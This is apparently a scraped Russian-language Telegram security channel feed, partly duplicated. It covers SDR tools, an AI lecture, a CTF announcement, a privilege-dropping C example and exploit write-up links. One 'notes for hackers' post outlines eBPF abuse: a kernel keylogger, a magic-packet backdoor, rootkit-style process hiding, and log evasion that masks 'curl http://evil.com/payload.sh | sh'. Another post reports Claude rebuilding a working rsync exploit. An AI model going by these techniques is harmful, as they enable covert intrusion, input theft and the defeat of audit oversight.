Ground Station
*
Полный набор open source инструментов для мониторинга спутников и декодирования сигналов с помощью локального SDR, включая загрузку метеорологических изображений и тд.
*
all-in-one
*
Полный набор open source инструментов для мониторинга спутников и декодирования сигналов с помощью локального SDR, включая загрузку метеорологических изображений и тд.
*
all-in-one
👍23😱6🔥1
Stanford CS230 | Autumn 2025 | Lecture 8: Agents, Prompts, and RAG
*
Стэнфордский курс по созданию систем ИИ уделывает все туториалы Claude и треды по промптингу.
Реально учит инженеров создавать с нуля надёжные системы ИИ
https://www.youtube.com/watch?v=k1njvbBmfsw
*
Стэнфордский курс по созданию систем ИИ уделывает все туториалы Claude и треды по промптингу.
Реально учит инженеров создавать с нуля надёжные системы ИИ
https://www.youtube.com/watch?v=k1njvbBmfsw
YouTube
Stanford CS230 | Autumn 2025 | Lecture 8: Agents, Prompts, and RAG
For more information about Stanford’s Artificial Intelligence professional and graduate programs, visit: https://stanford.io/ai
November 11, 2025
This lecture covers agents, prompts, and RAG.
To learn more about enrolling in this course, visit: https:…
November 11, 2025
This lecture covers agents, prompts, and RAG.
To learn more about enrolling in this course, visit: https:…
👍11🔥9😱2
Рубрика На заметку
*
*
Хотя eBPF изначально это tracing (perf, bpftrace) / networking (XDP) / security (Cilium) для нас eBPF = возможность запускать свои грязные лапы по средствам программ прямо в
Влияние на ядро без модулей !
Вся безопасность на eBPF verifier - он вроде как должен гарантировать что: нет выхода за границы, нет произвольной записи в память, нет kernel corruption и прочего непотребства.
verifier можно сломать !
verifier можно обойти !
*
CAP_BPF / CAP_SYS_ADMIN
Неочевидный кейс
То можно загружать eBPF программы, влиять на систему. И это не баг, а штатное поведение.
*
*
Кейлоггер в ядре
eBPF цепляется к:
И всё ! весь ввод теперь наш. нет процесса, нет бинаря, нет демона, все в kernel.
*
*
Invisible backdoor и network hook
eBPF можно повесить на socket или на tcp connect или XDP (уровень сетевухи), ииии если послать magic packet (например "0xproxybar") можно ыполнить действие (шелл отдать или payload запустить), порт не открыт, netstat ничего не показывает, firewall чист, а backdoor есть.
*
*
userspace rootkit без LKM
Концепт таков: перехватывает
В итоге
*
*
Bypass audit / logging
Если запустить
userspace > вызывает syscall (execve) > kernel обрабатывает syscall > auditd получает событие > поздравляю выв танцах в логах
eBPF нужно вклинить между syscall и логированием, а именно через:
kprobe или tracepoint или LSM hooks.
Если eBPF висит на execve, можно фильтровать событий ДО логирования.
Или частая тема с сокрытием аргументов - запустили curl
Или что называется selective stealth, можно же не отключать всё, а только конкретные процессы \ команды \ UIDы:
В Linux можно не маскировать действия, достаточно скрыть факт, что они вообще были.
#РубрикаНаЗаметкуХакеру
$USERNAME@hacker.wtf - part 10*
*
Хотя eBPF изначально это tracing (perf, bpftrace) / networking (XDP) / security (Cilium) для нас eBPF = возможность запускать свои грязные лапы по средствам программ прямо в
kernel space . Влияние на ядро без модулей !
Вся безопасность на eBPF verifier - он вроде как должен гарантировать что: нет выхода за границы, нет произвольной записи в память, нет kernel corruption и прочего непотребства.
verifier можно сломать !
verifier можно обойти !
*
CAP_BPF / CAP_SYS_ADMIN
Неочевидный кейс
### Если процесс имеет:
CAP_BPF
### или
CAP_SYS_ADMIN
##check
getcap -r / 2>/dev/null
То можно загружать eBPF программы, влиять на систему. И это не баг, а штатное поведение.
*
*
Кейлоггер в ядре
eBPF цепляется к:
sys_read
tty_read
input subsystem
И всё ! весь ввод теперь наш. нет процесса, нет бинаря, нет демона, все в kernel.
*
*
Invisible backdoor и network hook
eBPF можно повесить на socket или на tcp connect или XDP (уровень сетевухи), ииии если послать magic packet (например "0xproxybar") можно ыполнить действие (шелл отдать или payload запустить), порт не открыт, netstat ничего не показывает, firewall чист, а backdoor есть.
*
*
userspace rootkit без LKM
Концепт таков: перехватывает
sys_getdents (это syscall который делает ls), если имя нашего процесса evil - не возвращаем его в список/В итоге
ps aux грустит, а evil живет свою жизнь. *
*
Bypass audit / logging
Если запустить
/tmp/evil.sh произойдет цепочка:userspace > вызывает syscall (execve) > kernel обрабатывает syscall > auditd получает событие > поздравляю вы
eBPF нужно вклинить между syscall и логированием, а именно через:
kprobe или tracepoint или LSM hooks.
Если eBPF висит на execve, можно фильтровать событий ДО логирования.
Или частая тема с сокрытием аргументов - запустили curl
http://evil.com/payload.sh | sh а eBPF делает execve("/usr/bin/curl", "safe args")Или что называется selective stealth, можно же не отключать всё, а только конкретные процессы \ команды \ UIDы:
если uid == 1000 > в логи
если uid == 1337 > в null
В Linux можно не маскировать действия, достаточно скрыть факт, что они вообще были.
#РубрикаНаЗаметкуХакеру
👍22🔥8😱3
II Всероссийский турнир по защите информации «GO CTF TATARSTAN»: регистрация открыта 🚩
В Казани снова соберутся те, кто умеет взламывать и защищать. Уже третий раз здесь встретятся сильнейшие по кибербезу среди молодых специалистов. Если давно смотришь на CTF и думаешь «хочу в дело» — самое время: турнир поможет проверить себя в бою, прокачать скиллы и заявить о себе как о будущем профи по кибербезопасности.
Заявки принимаются до 22 мая 12:00 в двух зачетах:
⏺️ Школьный, обучающиеся 7-11 классов
⏺️ Академический, студенты СПО до 23 лет
Основные этапы турнира:
🔹Регистрация команд — до 22 мая 12:00 по московскому времени
🔹Отборочный этап в формате онлайн - 23 мая с 10:00 до 18:00
🔹Финальный этап в Казани — 25 октября
Собирай команду, регистрируйся на сайте и готовься ворваться в отборы 23 мая в онлайн формате. Посмотрим, кто в этом году заберет статус сильнейшей команды по кибербезу среди молодежи. Удачи, она тебе пригодится 💬
В Казани снова соберутся те, кто умеет взламывать и защищать. Уже третий раз здесь встретятся сильнейшие по кибербезу среди молодых специалистов. Если давно смотришь на CTF и думаешь «хочу в дело» — самое время: турнир поможет проверить себя в бою, прокачать скиллы и заявить о себе как о будущем профи по кибербезопасности.
Заявки принимаются до 22 мая 12:00 в двух зачетах:
⏺️ Школьный, обучающиеся 7-11 классов
⏺️ Академический, студенты СПО до 23 лет
Призовой фонд турнира — 700 000 рублей 🔥
Основные этапы турнира:
🔹Регистрация команд — до 22 мая 12:00 по московскому времени
🔹Отборочный этап в формате онлайн - 23 мая с 10:00 до 18:00
🔹Финальный этап в Казани — 25 октября
Собирай команду, регистрируйся на сайте и готовься ворваться в отборы 23 мая в онлайн формате. Посмотрим, кто в этом году заберет статус сильнейшей команды по кибербезу среди молодежи. Удачи, она тебе пригодится 💬
👍9😱4
Reverse proxy для анонимизации Claude Code в взаимодействиях с пентестом.
Он находится между Claude Code и Anthropic API. Каждое сообщение, выход bash, чтение файла и результат grep анонимизируются перед выходом с машины. Ответы деанонимизируются до того, как Клод Код их видит. Клод никогда не трогает реальные клиентские данные.
*
LLM Anonymization
Он находится между Claude Code и Anthropic API. Каждое сообщение, выход bash, чтение файла и результат grep анонимизируются перед выходом с машины. Ответы деанонимизируются до того, как Клод Код их видит. Клод никогда не трогает реальные клиентские данные.
*
LLM Anonymization
👍28🔥8😱4
Linux System Call of the Day
*
Если достичь определенных ограничений ресурсов (например
Hackers dream.
Man-страница прямо говорит: пропуск проверки return value — это большая ошибка безопасности.
Пример того как сервис дропает привилегии:
*
Если достичь определенных ограничений ресурсов (например
RLIMIT_NPROC) и программа не проверяет этот сбой, она тихо продолжит выполнение остального кода как root.Hackers dream.
Man-страница прямо говорит: пропуск проверки return value — это большая ошибка безопасности.
Пример того как сервис дропает привилегии:
#define _GNU_SOURCE
#include <grp.h>
#include <stdio.h>
#include <unistd.h>
int main() {
// Assume 33 is the UID/GID for www-data on Debian/Ubuntu
uid_t target_uid = 33;
gid_t target_gid = 33;
printf("Running setup as root...\n");
// Drop supplementary groups first, then GID, then UID.
// Order matters: once UID is non-root, you can't fix groups.
if (setgroups(0, NULL) == -1) {
perror("setgroups");
return 1;
}
if (setresgid(target_gid, target_gid, target_gid) == -1) {
perror("setresgid");
return 1;
}
if (setresuid(target_uid, target_uid, target_uid) == -1) {
perror("setresuid");
return 1;
}
printf("Privileges dropped successfully. Safe to handle requests!\n");
// Prove we can't go back to root (UID 0)
if (setresuid(0, 0, 0) == -1) {
printf("Confirmed: Cannot restore root privileges.\n");
}
return 0;
}
👍24🔥5
MAD Bugs: Feeding Claude Phrack Articles for Fun and Profit
Original text by Calif
The article describes an experiment in which Claude was given a Phrack write-up about chaining two rsync vulnerabilities into unauthenticated RCE, then asked to rebuild and adapt the exploit for a different target environment. Calif’s key point is not just that the model reproduced a working exploit, but that it handled…
https://core-jmp.org/2026/04/mad-bugs-feeding-claude-phrack-articles-for-fun-and-profit/
Original text by Calif
The article describes an experiment in which Claude was given a Phrack write-up about chaining two rsync vulnerabilities into unauthenticated RCE, then asked to rebuild and adapt the exploit for a different target environment. Calif’s key point is not just that the model reproduced a working exploit, but that it handled…
https://core-jmp.org/2026/04/mad-bugs-feeding-claude-phrack-articles-for-fun-and-profit/
🔥8👍4
CVE-2026-39813 - FortiSandbox
*
Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API
*
Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API
👍11🔥5😱1
WOW
Pack2TheRoot - CVE-2026-41651
*
Любой локальный непривилегированный пользователь может устанавливать произвольные пакеты от root без аутентификации.
протестировано на:
*
make Exploit
Pack2TheRoot - CVE-2026-41651
*
Любой локальный непривилегированный пользователь может устанавливать произвольные пакеты от root без аутентификации.
протестировано на:
Ubuntu/Debian/RockyLinux/Fedora*
make Exploit
😱28👍13🔥1